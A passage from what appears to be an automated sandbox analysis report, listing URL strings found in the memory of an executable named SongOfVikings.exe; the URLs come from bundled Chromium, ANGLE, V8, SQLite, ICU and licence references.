Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://scripts.sil.org/OFL
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://source.android.com/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://source.android.com/compatibility)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://source.icu-project.org/repos/icu/data/trunk/charset/data/xml/gb-18030-2000.xml
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://sqlite.org/cli.html#sqlite_archive_support
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/deps/third_party/xz/COPYING
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/16459606/376773
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/398120/376773
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/a/5982798/376773
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc3501#section-5.1.3
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc3501#section-5.1.3)
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tukaani.org/xz/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://valgrind.org
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://web.archive.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://webkit.org/
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.chromium.org
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fossil-scm.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.futurealoof.com)
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/gethelp/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gnu.org/s/libtool/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.haible.de/bruno/charsets/conversion-tables/Big5.html
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.icu-project.org/userguide/posix.html#case_mappings
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jaredhanson.net/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jclark.com/xt
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.khngai.com/chinese/charmap/tblgbk.php?page=0
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.nongnu.org/freebangfont/downloads.html#mukti
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ogcio.gov.hk/en/business/tech_promotion/ccli/terms/doc/2003cmp_2008.txt
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ogcio.gov.hk/tc/business/tech_promotion/ccli/terms/doc/hkscs-2008-big5-iso.txt
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ploscompbiol.org/static/license
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org)
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/compile.html).
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/tclsqlite.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.strongtalk.org/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com/tools/smslib.html
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com/tools/smslib.html>
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/MAPPINGS/OBSOLETE/EASTASIA/OTHER/BIG5.TXT)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WINDOWS/CP950.TXT
Source: SongOfVikings.exe, 00000000.00000003.1754734793.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www8.plala.or.jp/tkubota1/unicode-symbols-map2.html
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/namespace
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/namespacehttp://www.jclark.com/xtxsl:key
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/xsltNewExtDef
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zlib.net/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://alekberg.net/privacy
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://android.com/pay
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4674
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4849
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5140
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5536
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246enableCaptureLimitsSet
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7405
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/uploadhttps://beacons.gvt2.com/domainreliability/uplo
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons2.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons3.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons4.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt3.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/audio-worklet)
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/audio-worklet)ScriptProcessorHandler::ProcessScriptProcessorHandler::Process
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.fuchsia.dev/p/fuchsia/issues/detail?id=107106
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=162431
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=310299
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=912470#c31
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: SongOfVikings.exe, 00000000.00000003.1903222997.0000000006526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=af&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=am&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1903282171.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ar&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=fa&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1904126521.0000000006527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=fi&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905010134.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ms&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905180838.0000000006527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=nl&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905115227.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=no&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905428858.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ru&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ur&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chromium.dns.nextdns.io
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/angle/angle/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://cleanbrowsing.org/privacy
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#clear
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#table
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1042393
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1046462
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1060012
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1091824
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1137851
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908.
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908.The
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908Changing
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1300575
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1356053
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1393662).
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024selectViewInGeometryShaderThe
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547callClearTwiceUsing
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534useSystemMemoryForConstantBuffersCopying
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/705865
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/710443
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/811661
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/848952
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/v8/7848
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/draft-ietf-rtcweb-ip-handling.
